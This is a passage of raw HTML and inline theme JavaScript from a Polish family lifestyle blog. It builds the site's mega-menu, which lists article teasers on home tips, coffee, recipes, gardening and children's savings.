restauracji? Doskona\u0142y pomys\u0142!<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-12-03T11:28:53+00:00\" >3 grudnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/jak-nauczyc-dziecko-oszczedzania\/\" rel=\"bookmark\" title=\"Jak nauczy\u0107 dziecko oszcz\u0119dzania?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/f8e084_fitted_740x0-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/f8e084_fitted_740x0-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/f8e084_fitted_740x0-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/f8e084_fitted_740x0-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Jak nauczy\u0107 dziecko oszcz\u0119dzania?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/porady-i-kuchnia\/porady-domowe\/\" class=\"td-post-category\">Porady domowe<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/jak-nauczyc-dziecko-oszczedzania\/\" rel=\"bookmark\" title=\"Jak nauczy\u0107 dziecko oszcz\u0119dzania?\">Jak nauczy\u0107 dziecko oszcz\u0119dzania?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-11-07T19:55:59+00:00\" >7 listopada 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/szybka-pozyczka-dla-zadluzonych-mile-widziana\/\" rel=\"bookmark\" title=\"Szybka po\u017cyczka dla zad\u0142u\u017conych mile widziana\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/05b26866-e147-4e97-be83-f6266f1209ca-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/05b26866-e147-4e97-be83-f6266f1209ca-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/05b26866-e147-4e97-be83-f6266f1209ca-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/05b26866-e147-4e97-be83-f6266f1209ca-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Szybka po\u017cyczka dla zad\u0142u\u017conych mile widziana\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/porady-i-kuchnia\/porady-domowe\/\" class=\"td-post-category\">Porady domowe<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/szybka-pozyczka-dla-zadluzonych-mile-widziana\/\" rel=\"bookmark\" title=\"Szybka po\u017cyczka dla zad\u0142u\u017conych mile widziana\">Szybka po\u017cyczka dla zad\u0142u\u017conych mile widziana<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-09-20T17:35:22+00:00\" >20 wrze\u015bnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_47_5c5e20b79eb31","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_47_5c5e20b79eb31));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 43;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/jak-wybrac-firme-kurierska\/\" rel=\"bookmark\" title=\"Jak wybra\u0107 firm\u0119 kuriersk\u0105?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/657d6f98d63e129602c5da4fe38e9257-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/657d6f98d63e129602c5da4fe38e9257-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/657d6f98d63e129602c5da4fe38e9257-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/657d6f98d63e129602c5da4fe38e9257-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Jak wybra\u0107 firm\u0119 kuriersk\u0105?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/porady-i-kuchnia\/porady-kawosza\/\" class=\"td-post-category\">Porady kawosza<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/jak-wybrac-firme-kurierska\/\" rel=\"bookmark\" title=\"Jak wybra\u0107 firm\u0119 kuriersk\u0105?\">Jak wybra\u0107 firm\u0119 kuriersk\u0105?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-07-17T11:13:49+00:00\" >17 lipca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/kawa-musi-byc-nudna\/\" rel=\"bookmark\" title=\"Kawa nie musi by\u0107 nudna!\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/12\/kubek-zimowej-kawy.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/12\/kubek-zimowej-kawy.jpg 1000w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/12\/kubek-zimowej-kawy-300x225.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/12\/kubek-zimowej-kawy-768x576.jpg 768w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Kawa nie musi by\u0107 nudna!\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/porady-i-kuchnia\/porady-kawosza\/\" class=\"td-post-category\">Porady kawosza<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/kawa-musi-byc-nudna\/\" rel=\"bookmark\" title=\"Kawa nie musi by\u0107 nudna!\">Kawa nie musi by\u0107 nudna!<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2016-12-27T10:23:13+00:00\" >27 grudnia 2016<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/pyszne-herbaty-lato\/\" rel=\"bookmark\" title=\"Pyszne herbaty \u2013 w sam raz na lato!\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/06\/herbaty.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/06\/herbaty.jpg 850w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/06\/herbaty-300x224.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/06\/herbaty-768x574.jpg 768w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Pyszne herbaty \u2013 w sam raz na lato!\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/porady-i-kuchnia\/porady-kawosza\/\" class=\"td-post-category\">Porady kawosza<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/pyszne-herbaty-lato\/\" rel=\"bookmark\" title=\"Pyszne herbaty \u2013 w sam raz na lato!\">Pyszne herbaty \u2013 w sam raz na lato!<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2016-06-08T17:48:31+00:00\" >8 czerwca 2016<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_47_5c5e20b79eb31","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_47_5c5e20b79eb31));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 44;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/szukasz-zdrowego-oleju-poznaj-olejarnie-gaja\/\" rel=\"bookmark\" title=\"Szukasz zdrowego oleju? Poznaj Olejarni\u0119 Gaja\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/fotolia_234258938_subscription_xxl-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/fotolia_234258938_subscription_xxl-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/fotolia_234258938_subscription_xxl-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/fotolia_234258938_subscription_xxl-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Szukasz zdrowego oleju? Poznaj Olejarni\u0119 Gaja\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/porady-i-kuchnia\/przepisy-kulinarne\/\" class=\"td-post-category\">Przepisy kulinarne<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/szukasz-zdrowego-oleju-poznaj-olejarnie-gaja\/\" rel=\"bookmark\" title=\"Szukasz zdrowego oleju? Poznaj Olejarni\u0119 Gaja\">Szukasz zdrowego oleju? Poznaj Olejarni\u0119 Gaja<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-12-05T10:26:51+00:00\" >5 grudnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/jak-samemu-udekorowac-tort\/\" rel=\"bookmark\" title=\"Jak samemu udekorowa\u0107 tort?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/5753e6004d0da9e0f3d2e020dc9452ac-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/5753e6004d0da9e0f3d2e020dc9452ac-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/5753e6004d0da9e0f3d2e020dc9452ac-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/5753e6004d0da9e0f3d2e020dc9452ac-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Jak samemu udekorowa\u0107 tort?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/porady-i-kuchnia\/przepisy-kulinarne\/\" class=\"td-post-category\">Przepisy kulinarne<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/jak-samemu-udekorowac-tort\/\" rel=\"bookmark\" title=\"Jak samemu udekorowa\u0107 tort?\">Jak samemu udekorowa\u0107 tort?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-09-29T09:19:42+00:00\" >29 wrze\u015bnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/czy-ketchup-ma-wartosci-odzywcze\/\" rel=\"bookmark\" title=\"Czy ketchup ma warto\u015bci od\u017cywcze?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/kor-czy-ketchup-ma-wartosci-odzywcze-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/kor-czy-ketchup-ma-wartosci-odzywcze-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/kor-czy-ketchup-ma-wartosci-odzywcze-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/kor-czy-ketchup-ma-wartosci-odzywcze-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Czy ketchup ma warto\u015bci od\u017cywcze?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/porady-i-kuchnia\/przepisy-kulinarne\/\" class=\"td-post-category\">Przepisy kulinarne<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/czy-ketchup-ma-wartosci-odzywcze\/\" rel=\"bookmark\" title=\"Czy ketchup ma warto\u015bci od\u017cywcze?\">Czy ketchup ma warto\u015bci od\u017cywcze?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-09-05T15:27:12+00:00\" >5 wrze\u015bnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_47_5c5e20b79eb31","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_47_5c5e20b79eb31));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 83;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/upiekszamy-mieszkanie\/\" rel=\"bookmark\" title=\"Upi\u0119kszamy mieszkanie\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/pots-716579_1280-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/pots-716579_1280-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/pots-716579_1280-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/pots-716579_1280-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Upi\u0119kszamy mieszkanie\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/porady-i-kuchnia\/twoj-dom-i-ogrod\/\" class=\"td-post-category\">Tw\u00f3j dom i ogr\u00f3d<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/upiekszamy-mieszkanie\/\" rel=\"bookmark\" title=\"Upi\u0119kszamy mieszkanie\">Upi\u0119kszamy mieszkanie<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-11-21T20:40:22+00:00\" >21 listopada 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/uprawa-narcyzow\/\" rel=\"bookmark\" title=\"Uprawa narcyz\u00f3w\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/narcyzy-ok-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/narcyzy-ok-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/narcyzy-ok-300x225.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/narcyzy-ok-768x576.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/narcyzy-ok-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/narcyzy-ok-245x184.jpg 245w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/narcyzy-ok-640x480.jpg 640w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/narcyzy-ok.jpg 877w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Uprawa narcyz\u00f3w\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/porady-i-kuchnia\/twoj-dom-i-ogrod\/\" class=\"td-post-category\">Tw\u00f3j dom i ogr\u00f3d<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/uprawa-narcyzow\/\" rel=\"bookmark\" title=\"Uprawa narcyz\u00f3w\">Uprawa narcyz\u00f3w<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-07-13T13:34:57+00:00\" >13 lipca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/brykiet-kominkowy-co-warto-o-nim-wiedziec\/\" rel=\"bookmark\" title=\"Brykiet kominkowy \u2013 co warto o nim wiedzie\u0107?\"><img width=\"211\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/brykietkabus4.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/brykietkabus4.jpg 992w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/brykietkabus4-300x278.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/brykietkabus4-768x711.jpg 768w\" sizes=\"(max-width: 211px) 100vw, 211px\" alt=\"\" title=\"Brykiet kominkowy \u2013 co warto o nim wiedzie\u0107?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/porady-i-kuchnia\/twoj-dom-i-ogrod\/\" class=\"td-post-category\">Tw\u00f3j dom i ogr\u00f3d<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/brykiet-kominkowy-co-warto-o-nim-wiedziec\/\" rel=\"bookmark\" title=\"Brykiet kominkowy \u2013 co warto o nim wiedzie\u0107?\">Brykiet kominkowy \u2013 co warto o nim wiedzie\u0107?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-03-07T10:37:53+00:00\" >7 marca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_47_5c5e20b79eb31","td_hide_prev":true,"td_hide_next":false}));
                                    </script>
            <div class="td-container td_block_wrap td_block_mega_menu td_uid_47_5c5e20b79eb31_rand td_with_ajax_pagination td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_47_5c5e20b79eb31"><div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><a class="mega-menu-sub-cat-td_uid_47_5c5e20b79eb31" id="td_uid_48_5c5e20b79eec7" data-td_block_id="td_uid_47_5c5e20b79eb31" data-td_filter_value="45" href="http://www.erodzina.com/kategoria/porady-i-kuchnia/kuchnia-malucha/">Kuchnia malucha</a><a class="mega-menu-sub-cat-td_uid_47_5c5e20b79eb31" id="td_uid_49_5c5e20b79eef8" data-td_block_id="td_uid_47_5c5e20b79eb31" data-td_filter_value="42" href="http://www.erodzina.com/kategoria/porady-i-kuchnia/porady-domowe/">Porady domowe</a><a class="mega-menu-sub-cat-td_uid_47_5c5e20b79eb31" id="td_uid_50_5c5e20b79ef1f" data-td_block_id="td_uid_47_5c5e20b79eb31" data-td_filter_value="43" href="http://www.erodzina.com/kategoria/porady-i-kuchnia/porady-kawosza/">Porady kawosza</a><a class="mega-menu-sub-cat-td_uid_47_5c5e20b79eb31" id="td_uid_51_5c5e20b79ef45" data-td_block_id="td_uid_47_5c5e20b79eb31" data-td_filter_value="44" href="http://www.erodzina.com/kategoria/porady-i-kuchnia/przepisy-kulinarne/">Przepisy kulinarne</a><a class="mega-menu-sub-cat-td_uid_47_5c5e20b79eb31" id="td_uid_52_5c5e20b79ef69" data-td_block_id="td_uid_47_5c5e20b79eb31" data-td_filter_value="83" href="http://www.erodzina.com/kategoria/porady-i-kuchnia/twoj-dom-i-ogrod/">Twój dom i ogród</a><a class="cur-sub-cat mega-menu-sub-cat-td_uid_47_5c5e20b79eb31 mega-menu-cat-all" id="td_uid_53_5c5e20b79ef8d" data-td_block_id="td_uid_47_5c5e20b79eb31" data-td_filter_value="" href="http://www.erodzina.com/kategoria/porady-i-kuchnia/">Wszystko Porady i Kuchnia</a></div></div><div id="td_uid_47_5c5e20b79eb31" class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/szukasz-zdrowego-oleju-poznaj-olejarnie-gaja/" rel="bookmark" title="Szukasz zdrowego oleju? Poznaj Olejarnię Gaja"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2018/12/fotolia_234258938_subscription_xxl-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2018/12/fotolia_234258938_subscription_xxl-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2018/12/fotolia_234258938_subscription_xxl-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2018/12/fotolia_234258938_subscription_xxl-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Szukasz zdrowego oleju? Poznaj Olejarnię Gaja"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/porady-i-kuchnia/przepisy-kulinarne/" class="td-post-category">Przepisy kulinarne</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/szukasz-zdrowego-oleju-poznaj-olejarnie-gaja/" rel="bookmark" title="Szukasz zdrowego oleju? Poznaj Olejarnię Gaja">Szukasz zdrowego oleju? Poznaj Olejarnię Gaja</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-12-05T10:26:51+00:00">5 grudnia 2018</time></span>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/urodziny-dziecka-w-restauracji-doskonaly-pomysl/" rel="bookmark" title="Urodziny dziecka w restauracji? Doskonały pomysł!"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2018/12/glowne-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2018/12/glowne-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2018/12/glowne-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2018/12/glowne-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Urodziny dziecka w restauracji? Doskonały pomysł!"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/porady-i-kuchnia/porady-domowe/" class="td-post-category">Porady domowe</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/urodziny-dziecka-w-restauracji-doskonaly-pomysl/" rel="bookmark" title="Urodziny dziecka w restauracji? Doskonały pomysł!">Urodziny dziecka w restauracji? Doskonały pomysł!</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-12-03T11:28:53+00:00">3 grudnia 2018</time></span>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/upiekszamy-mieszkanie/" rel="bookmark" title="Upiększamy mieszkanie"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2018/11/pots-716579_1280-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2018/11/pots-716579_1280-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2018/11/pots-716579_1280-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2018/11/pots-716579_1280-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Upiększamy mieszkanie"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/porady-i-kuchnia/twoj-dom-i-ogrod/" class="td-post-category">Twój dom i ogród</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/upiekszamy-mieszkanie/" rel="bookmark" title="Upiększamy mieszkanie">Upiększamy mieszkanie</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-11-21T20:40:22+00:00">21 listopada 2018</time></span>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_47_5c5e20b79eb31" data-td_block_id="td_uid_47_5c5e20b79eb31"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#" class="td-ajax-next-page" id="next-page-td_uid_47_5c5e20b79eb31" data-td_block_id="td_uid_47_5c5e20b79eb31"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor td-menu-item td-mega-menu menu-item-5104"><a href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/" class="sf-with-ul">Rozrywka<i class="td-icon-menu-down"></i></a>
<ul class="sub-menu" style="display: none; float: none; width: 20em;">
	<li class="menu-item-0" style="white-space: normal; float: left; width: 100%;"><div class="td-container-border"><div class="td-mega-grid"><script>var block_td_uid_54_5c5e20b7a414d = new tdBlock();
block_td_uid_54_5c5e20b7a414d.id = "td_uid_54_5c5e20b7a414d";
block_td_uid_54_5c5e20b7a414d.atts = '{"limit":3,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"12","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"preload","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"Wszystko","color_preset":"","border_top":"","class":"td_uid_54_5c5e20b7a414d_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_54_5c5e20b7a414d_rand","tdc_css_class_style":"td_uid_54_5c5e20b7a414d_rand_style","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}';
block_td_uid_54_5c5e20b7a414d.td_column_number = "3";
block_td_uid_54_5c5e20b7a414d.block_type = "td_block_mega_menu";
